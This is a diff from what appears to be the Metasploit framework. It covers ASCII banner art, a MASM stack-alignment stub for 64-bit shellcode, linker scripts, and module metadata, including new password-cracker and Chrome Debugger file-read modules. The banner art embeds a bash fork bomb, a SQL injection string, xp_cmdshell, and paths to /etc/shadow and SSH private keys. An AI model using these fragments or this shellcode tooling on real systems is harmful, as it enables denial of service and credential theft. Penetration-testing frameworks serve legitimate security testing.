+                                              `:oDFo:`                            
+                                           ./ymM0dayMmy/.                          
+                                        -+dHJ5aGFyZGVyIQ==+-                    
+                                    `:sm⏣~~Destroy.No.Data~~s:`                
+                                 -+h2~~Maintain.No.Persistence~~h+-              
+                             `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`          
+                          ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.      
+                       -++SecKCoin++e.AMd`       `.-://///+hbove.913.ElsMNh+-    
+                      -~/.ssh/id_rsa.Des-                  `htN01UserWroteMe!-  
+                      :dopeAW.No<nano>o                     :is:TЯiKC.sudo-.A:  
+                      :we're.all.alike'`                     The.PFYroy.No.D7:  
+                      :PLACEDRINKHERE!:                      yxp_cmdshell.Ab0:    
+                      :msf>exploit -j.                       :Ns.BOB&ALICEes7:    
+                      :---srwxrwx:-.`                        `MS146.52.No.Per:    
+                      :<script>.Ac816/                        sENbove3101.404:    
+                      :NT_AUTHORITY.Do                        `T:/shSYSTEM-.N:    
+                      :09.14.2011.raid                       /STFU|wall.No.Pr:    
+                      :hvensntSurb025N.                      dNVRGOING2GIVUUP:    
+                      :#OUTHOUSE-  -s:                       /corykennedyData:    
+                      :$nmap -oS                              SSo.6178306Ence:    
+                      :Awsm.da:                            /shMTl#beats3o.No.:    
+                      :Ring0:                             `dDestRoyREXKC3ta/M:    
+                      :23d:                               sSETEC.ASTRONOMYist:    
+                       /-                        /yo-    .ence.N:(){ :|: & };:    
+                                                 `:Shall.We.Play.A.Game?tron/    
+                                                 ```-ooy.if1ghtf0r+ehUser5`    
+                                               ..th3.H1V3.U2VjRFNN.jMh+.`          
+                                              `MjM~~WE.ARE.se~~MMjMs              
+                                               +~KANSAS.CITY's~-`                  
+                                                J~HAKCERS~./.`                    
+                                                .esc:wq!:`                        
+                                                 +++ATH`                            
+                                                  `

data/logos/honk.txt

@@ -0,0 +1,22 @@
+%clr                                   ___          ____
+                               ,-""   `.%yel      %whi< HONK >
+                             ,'  _   e %yel)`-._%whi /  ----
+                            /  ,' `-._%yel<.===-'%whi
+                           /  /
+                          /  ;
+              _          /   ;
+ (`._    _.-"" ""--..__,'    |
+ <_  `-""                     \
+  <`-                          :
+   (__   <__.                  ;
+     `-.   '-.__.      _.'    /
+        \      `-.__,-'    _,'
+         `._    ,    /__,-'
+            ""._\__,'%yel< <____%whi
+                 %yel| |  `----.`.
+%whi                 %yel| |        \ `.
+%whi                 %yel; |___      \-``
+%whi                 %yel\   --<
+%whi                  %yel`.`.<
+%whi                    %yel`-'
+%whi

data/logos/null-pointer-deref.txt

@@ -31,7 +31,7 @@ Stack: 90909090990909090990909090
        ffffffff..................
 %clr
 
-%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr
+%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N5 00 00 00 00%clr
 Aiee, Killing Interrupt handler
 %redKernel panic: Attempted to kill the idle task!
 In swapper task - not syncing%clr

data/utilities/encrypted_payload/AdjustStack.asm

@@ -0,0 +1,48 @@
+/*
+ * This code is provided under the 3-clause BSD license below.
+ * ***********************************************************
+ *
+ * Copyright (c) 2013, Matthew Graeber
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+ *
+ *   Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+ *   Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+ *   The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+; Author:       Matthew Graeber (@mattifestation)
+; License:      BSD 3-Clause
+; Syntax:       MASM
+; Build Syntax: ml64 /c /Cx AdjustStack.asm
+; Output:       AdjustStack.obj
+; Notes: I really wanted to avoid having this external dependency but I couldnt
+; come up with any other way to guarantee 16-byte stack alignment in 64-bit
+; shellcode written in C.
+
+extern	ExecutePayload
+global  AlignRSP			; Marking AlignRSP as PUBLIC allows for the function
+							; to be called as an extern in our C code.
+
+segment .text
+
+; AlignRSP is a simple call stub that ensures that the stack is 16-byte aligned prior
+; to calling the entry point of the payload. This is necessary because 64-bit functions
+; in Windows assume that they were called with 16-byte stack alignment. When amd64
+; shellcode is executed, you cant be assured that you stack is 16-byte aligned. For example,
+; if your shellcode lands with 8-byte stack alignment, any call to a Win32 function will likely
+; crash upon calling any ASM instruction that utilizes XMM registers (which require 16-byte)
+; alignment.
+
+AlignRSP:
+	push	rsi						; Preserve RSI since were stomping on it
+	mov		rsi, rsp				; Save the value of RSP so it can be restored
+	and		rsp, 0FFFFFFFFFFFFFFF0h	; Align RSP to 16 bytes
+	sub		rsp, 020h				; Allocate homing space for ExecutePayload
+	call	ExecutePayload			; Call the entry point of the payload
+	mov		rsp, rsi				; Restore the original value of RSP
+	pop		rsi						; Restore RSI
+	ret								; Return to caller

data/utilities/encrypted_payload/func_order.ld

@@ -0,0 +1,9 @@
+ENTRY(_ExecutePayload)
+SECTIONS
+{
+	.text :
+	{
+		*(.text.ExecutePayload)
+	}
+
+}

data/utilities/encrypted_payload/func_order64.ld

@@ -0,0 +1,11 @@
+ENTRY(AlignRSP)
+SECTIONS
+{
+	.text :
+	{
+    *(.text.AlignRSP)
+		*(.text.ExecutePayload)
+		*(.text.GetProcAddressWithHash)
+	}
+
+}

db/modules_metadata_base.json

@@ -220,7 +220,7 @@
     "path": "/modules/auxiliary/admin/atg/atg_client.rb",
     "is_install_path": true,
     "ref_name": "admin/atg/atg_client",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -649,7 +649,7 @@
     "path": "/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb",
     "is_install_path": true,
     "ref_name": "admin/cisco/cisco_secure_acs_bypass",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -1364,7 +1364,7 @@
     "path": "/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb",
     "is_install_path": true,
     "ref_name": "admin/http/cnpilot_r_cmd_exec",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -1411,7 +1411,7 @@
     "path": "/modules/auxiliary/admin/http/cnpilot_r_fpt.rb",
     "is_install_path": true,
     "ref_name": "admin/http/cnpilot_r_fpt",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -1458,7 +1458,7 @@
     "path": "/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "admin/http/contentkeeper_fileaccess",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -3176,7 +3176,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-05 14:26:34 +0000",
     "path": "/modules/auxiliary/admin/http/rails_devise_pass_reset.rb",
     "is_install_path": true,
     "ref_name": "admin/http/rails_devise_pass_reset",
@@ -3615,7 +3615,7 @@
     "path": "/modules/auxiliary/admin/http/tomcat_administration.rb",
     "is_install_path": true,
     "ref_name": "admin/http/tomcat_administration",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -3665,7 +3665,7 @@
     "path": "/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb",
     "is_install_path": true,
     "ref_name": "admin/http/tomcat_utf8_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -3717,7 +3717,7 @@
     "path": "/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb",
     "is_install_path": true,
     "ref_name": "admin/http/trendmicro_dlp_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -5228,7 +5228,7 @@
     "path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb",
     "is_install_path": true,
     "ref_name": "admin/mssql/mssql_findandsampledata",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -5318,7 +5318,7 @@
     "path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb",
     "is_install_path": true,
     "ref_name": "admin/mssql/mssql_ntlm_stealer",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -5567,7 +5567,7 @@
     "path": "/modules/auxiliary/admin/natpmp/natpmp_map.rb",
     "is_install_path": true,
     "ref_name": "admin/natpmp/natpmp_map",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -5656,7 +5656,7 @@
     "path": "/modules/auxiliary/admin/officescan/tmlisten_traversal.rb",
     "is_install_path": true,
     "ref_name": "admin/officescan/tmlisten_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -5689,7 +5689,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-05 14:22:18 +0000",
     "path": "/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb",
     "is_install_path": true,
     "ref_name": "admin/oracle/ora_ntlm_stealer",
@@ -6348,7 +6348,7 @@
     "path": "/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb",
     "is_install_path": true,
     "ref_name": "admin/sap/sap_mgmt_con_osexec",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -6828,7 +6828,7 @@
     "path": "/modules/auxiliary/admin/smb/check_dir_file.rb",
     "is_install_path": true,
     "ref_name": "admin/smb/check_dir_file",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -6867,7 +6867,7 @@
     "path": "/modules/auxiliary/admin/smb/delete_file.rb",
     "is_install_path": true,
     "ref_name": "admin/smb/delete_file",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -6906,7 +6906,7 @@
     "path": "/modules/auxiliary/admin/smb/download_file.rb",
     "is_install_path": true,
     "ref_name": "admin/smb/download_file",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -6994,7 +6994,7 @@
     "path": "/modules/auxiliary/admin/smb/ms17_010_command.rb",
     "is_install_path": true,
     "ref_name": "admin/smb/ms17_010_command",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -7043,7 +7043,7 @@
     "path": "/modules/auxiliary/admin/smb/psexec_command.rb",
     "is_install_path": true,
     "ref_name": "admin/smb/psexec_command",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -7164,7 +7164,7 @@
     "path": "/modules/auxiliary/admin/smb/upload_file.rb",
     "is_install_path": true,
     "ref_name": "admin/smb/upload_file",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -7204,7 +7204,7 @@
     "path": "/modules/auxiliary/admin/smb/webexec_command.rb",
     "is_install_path": true,
     "ref_name": "admin/smb/webexec_command",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -7241,7 +7241,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-05 13:50:30 +0000",
     "path": "/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb",
     "is_install_path": true,
     "ref_name": "admin/sunrpc/solaris_kcms_readfile",
@@ -7283,7 +7283,7 @@
     "path": "/modules/auxiliary/admin/teradata/teradata_odbc_sql.py",
     "is_install_path": true,
     "ref_name": "admin/teradata/teradata_odbc_sql",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -7801,7 +7801,7 @@
     "path": "/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb",
     "is_install_path": true,
     "ref_name": "admin/vxworks/wdbrpc_reboot",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -8029,7 +8029,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-03-21 20:54:32 +0000",
+    "mod_time": "2019-04-04 20:50:52 +0000",
     "path": "/modules/auxiliary/analyze/apply_pot.rb",
     "is_install_path": true,
     "ref_name": "analyze/apply_pot",
@@ -8040,6 +8040,277 @@
     },
     "needs_cleanup": false
   },
+  "auxiliary_analyze/crack_aix": {
+    "name": "Password Cracker: AIX",
+    "fullname": "auxiliary/analyze/crack_aix",
+    "aliases": [
+      "auxiliary/analyze/jtr_aix"
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "theLightCosine <theLightCosine@metasploit.com>",
+      "hdm <x@hdm.io>",
+      "h00die"
+    ],
+    "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n        acquired from passwd files on AIX systems.  These utilize DES hashing.\n        DES is format 1500 in Hashcat.\n        DES is descrypt in JTR.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-10-08 20:31:23 +0000",
+    "path": "/modules/auxiliary/analyze/crack_aix.rb",
+    "is_install_path": true,
+    "ref_name": "analyze/crack_aix",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_analyze/crack_databases": {
+    "name": "Password Cracker: Databases",
+    "fullname": "auxiliary/analyze/crack_databases",
+    "aliases": [
+      "auxiliary/analyze/jtr_mssql",
+      "auxiliary/analyze/jtr_mysql",
+      "auxiliary/analyze/jtr_oracle",
+      "auxiliary/analyze/jtr_postgres"
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "theLightCosine <theLightCosine@metasploit.com>",
+      "hdm <x@hdm.io>",
+      "h00die"
+    ],
+    "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n        acquired from the mssql_hashdump, mysql_hashdump, postgres_hashdump, or oracle_hashdump modules.\n        Passwords that have been successfully cracked are then saved as proper credentials.\n        Due to the complexity of some of the hash types, they can be very slow.  Setting the\n        ITERATION_TIMEOUT is highly recommended.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-10-08 20:31:23 +0000",
+    "path": "/modules/auxiliary/analyze/crack_databases.rb",
+    "is_install_path": true,
+    "ref_name": "analyze/crack_databases",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_analyze/crack_linux": {
+    "name": "Password Cracker: Linux",
+    "fullname": "auxiliary/analyze/crack_linux",
+    "aliases": [
+      "auxiliary/analyze/jtr_linux"
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "theLightCosine <theLightCosine@metasploit.com>",
+      "hdm <x@hdm.io>",
+      "h00die"
+    ],
+    "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n        acquired from unshadowed passwd files from Unix/Linux systems. The module will only crack\n        MD5, BSDi and DES implementations by default. However, it can also crack\n        Blowfish and SHA(256/512), but it is much slower.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-10-08 20:31:23 +0000",
+    "path": "/modules/auxiliary/analyze/crack_linux.rb",
+    "is_install_path": true,
+    "ref_name": "analyze/crack_linux",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_analyze/crack_mobile": {
+    "name": "Password Cracker: Mobile",
+    "fullname": "auxiliary/analyze/crack_mobile",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module uses Hashcat to identify weak passwords that have been\n        acquired from Android systems.  These utilize MD5 or SHA1 hashing.\n        Android (Samsung) SHA1 is format 5800 in Hashcat.  Android\n        (non-Samsung) SHA1 is format 110 in Hashcat.  Android MD5 is format 10.\n        JTR does not support Android hashes at the time of writing.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-11-17 13:44:19 +0000",
+    "path": "/modules/auxiliary/analyze/crack_mobile.rb",
+    "is_install_path": true,
+    "ref_name": "analyze/crack_mobile",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_analyze/crack_osx": {
+    "name": "Password Cracker: OSX",
+    "fullname": "auxiliary/analyze/crack_osx",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n        acquired from OSX systems. The module will only crack xsha from OSX 10.4-10.6, xsha512\n        from 10.7,  and PBKDF2 from OSX 10.8+.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-07-15 19:57:39 +0000",
+    "path": "/modules/auxiliary/analyze/crack_osx.rb",
+    "is_install_path": true,
+    "ref_name": "analyze/crack_osx",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_analyze/crack_webapps": {
+    "name": "Password Cracker: Webapps",
+    "fullname": "auxiliary/analyze/crack_webapps",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n        acquired from various web applications.\n        Atlassian uses PBKDF2-HMAC-SHA1 which is 12001 in hashcat.\n        PHPass uses phpass which is 400 in hashcat.\n        Mediawiki is MD5 based and is 3711 in hashcat.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-07-15 19:57:39 +0000",
+    "path": "/modules/auxiliary/analyze/crack_webapps.rb",
+    "is_install_path": true,
+    "ref_name": "analyze/crack_webapps",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_analyze/crack_windows": {
+    "name": "Password Cracker: Windows",
+    "fullname": "auxiliary/analyze/crack_windows",
+    "aliases": [
+      "auxiliary/analyze/jtr_crack_fast",
+      "auxiliary/analyze/jtr_windows"
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "theLightCosine <theLightCosine@metasploit.com>",
+      "hdm <x@hdm.io>",
+      "h00die"
+    ],
+    "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n        acquired from Windows systems. The module will only crack LANMAN/NTLM hashes.\n        LANMAN is format 3000 in hashcat.\n        NTLM is format 1000 in hashcat.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-10-08 20:31:23 +0000",
+    "path": "/modules/auxiliary/analyze/crack_windows.rb",
+    "is_install_path": true,
+    "ref_name": "analyze/crack_windows",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_analyze/jtr_aix": {
     "name": "John the Ripper AIX Password Cracker",
     "fullname": "auxiliary/analyze/jtr_aix",
@@ -8053,7 +8324,7 @@
       "theLightCosine <theLightCosine@metasploit.com>",
       "hdm <x@hdm.io>"
     ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from passwd files on AIX systems.  These utilize DES hashing.",
+    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from passwd files on AIX systems.",
     "references": [
 
     ],
@@ -8067,7 +8338,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-03-21 20:54:32 +0000",
+    "mod_time": "2019-11-07 19:09:52 +0000",
     "path": "/modules/auxiliary/analyze/jtr_aix.rb",
     "is_install_path": true,
     "ref_name": "analyze/jtr_aix",
@@ -8105,7 +8376,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-03-21 20:54:32 +0000",
+    "mod_time": "2019-11-07 19:09:52 +0000",
     "path": "/modules/auxiliary/analyze/jtr_linux.rb",
     "is_install_path": true,
     "ref_name": "analyze/jtr_linux",
@@ -8143,7 +8414,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-03-21 20:54:32 +0000",
+    "mod_time": "2019-11-07 19:09:52 +0000",
     "path": "/modules/auxiliary/analyze/jtr_mssql_fast.rb",
     "is_install_path": true,
     "ref_name": "analyze/jtr_mssql_fast",
@@ -8181,7 +8452,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-03-21 20:54:32 +0000",
+    "mod_time": "2019-11-07 19:09:52 +0000",
     "path": "/modules/auxiliary/analyze/jtr_mysql_fast.rb",
     "is_install_path": true,
     "ref_name": "analyze/jtr_mysql_fast",
@@ -8219,7 +8490,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-03-21 20:54:32 +0000",
+    "mod_time": "2019-11-07 19:09:52 +0000",
     "path": "/modules/auxiliary/analyze/jtr_oracle_fast.rb",
     "is_install_path": true,
     "ref_name": "analyze/jtr_oracle_fast",
@@ -8256,7 +8527,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-03-21 20:54:32 +0000",
+    "mod_time": "2019-11-07 19:09:52 +0000",
     "path": "/modules/auxiliary/analyze/jtr_postgres_fast.rb",
     "is_install_path": true,
     "ref_name": "analyze/jtr_postgres_fast",
@@ -8293,7 +8564,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-03-21 20:54:32 +0000",
+    "mod_time": "2019-11-07 19:09:52 +0000",
     "path": "/modules/auxiliary/analyze/jtr_windows_fast.rb",
     "is_install_path": true,
     "ref_name": "analyze/jtr_windows_fast",
@@ -8413,7 +8684,7 @@
     "path": "/modules/auxiliary/bnat/bnat_scan.rb",
     "is_install_path": true,
     "ref_name": "bnat/bnat_scan",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -8492,7 +8763,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-08-03 20:13:48 +0000",
+    "mod_time": "2019-10-05 14:40:27 +0000",
     "path": "/modules/auxiliary/client/iec104/iec104.rb",
     "is_install_path": true,
     "ref_name": "client/iec104/iec104",
@@ -8761,7 +9032,7 @@
     "path": "/modules/auxiliary/crawler/msfcrawler.rb",
     "is_install_path": true,
     "ref_name": "crawler/msfcrawler",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -9036,7 +9307,7 @@
     "path": "/modules/auxiliary/dos/dns/bind_tkey.rb",
     "is_install_path": true,
     "ref_name": "dos/dns/bind_tkey",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -9077,7 +9348,7 @@
     "path": "/modules/auxiliary/dos/dns/bind_tsig.rb",
     "is_install_path": true,
     "ref_name": "dos/dns/bind_tsig",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -9339,7 +9610,7 @@
     "path": "/modules/auxiliary/dos/http/apache_range_dos.rb",
     "is_install_path": true,
     "ref_name": "dos/http/apache_range_dos",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -10756,7 +11027,7 @@
     "path": "/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb",
     "is_install_path": true,
     "ref_name": "dos/ntp/ntpd_reserved_dos",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -10836,7 +11107,7 @@
     "path": "/modules/auxiliary/dos/rpc/rpcbomb.rb",
     "is_install_path": true,
     "ref_name": "dos/rpc/rpcbomb",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -11008,7 +11279,7 @@
     "path": "/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb",
     "is_install_path": true,
     "ref_name": "dos/sap/sap_soap_rfc_eps_delete_file",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -11922,7 +12193,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-08-24 21:38:44 +0000",
+    "mod_time": "2019-11-29 07:15:17 +0000",
     "path": "/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb",
     "is_install_path": true,
     "ref_name": "dos/windows/ftp/iis75_ftpd_iac_bof",
@@ -13385,11 +13656,11 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-07 08:01:52 +0000",
     "path": "/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb",
     "is_install_path": true,
     "ref_name": "fuzzers/dns/dns_fuzzer",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -13464,7 +13735,7 @@
     "path": "/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb",
     "is_install_path": true,
     "ref_name": "fuzzers/ftp/ftp_pre_post",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -13622,7 +13893,7 @@
     "path": "/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb",
     "is_install_path": true,
     "ref_name": "fuzzers/ntp/ntp_protocol_fuzzer",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -13934,7 +14205,7 @@
     "path": "/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb",
     "is_install_path": true,
     "ref_name": "fuzzers/smtp/smtp_fuzzer",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -14848,7 +15119,7 @@
     "path": "/modules/auxiliary/gather/c2s_dvr_password_disclosure.rb",
     "is_install_path": true,
     "ref_name": "gather/c2s_dvr_password_disclosure",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -14932,7 +15203,7 @@
     "path": "/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb",
     "is_install_path": true,
     "ref_name": "gather/cerberus_helpdesk_hash_disclosure",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -14977,6 +15248,53 @@
     },
     "needs_cleanup": false
   },
+  "auxiliary_gather/chrome_debugger": {
+    "name": "Chrome Debugger Arbitrary File Read / Arbitrary Web Request",
+    "fullname": "auxiliary/gather/chrome_debugger",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-09-24",
+    "type": "auxiliary",
+    "author": [
+      "Adam Baldwin (Evilpacket)",
+      "Nicholas Starke (The King Pig Demon)"
+    ],
+    "description": "This module uses the Chrome Debugger's API to read\n        files off the remote file system, or to make web requests\n        from a remote machine.  Useful for cloud metadata endpoints!",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 9222,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-12-12 09:57:10 +0000",
+    "path": "/modules/auxiliary/gather/chrome_debugger.rb",
+    "is_install_path": true,
+    "ref_name": "gather/chrome_debugger",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_gather/cisco_rv320_config": {
     "name": "Cisco RV320/RV326 Configuration Disclosure",
     "fullname": "auxiliary/gather/cisco_rv320_config",
@@ -15865,7 +16183,7 @@
     "path": "/modules/auxiliary/gather/get_user_spns.py",
     "is_install_path": true,
     "ref_name": "gather/get_user_spns",
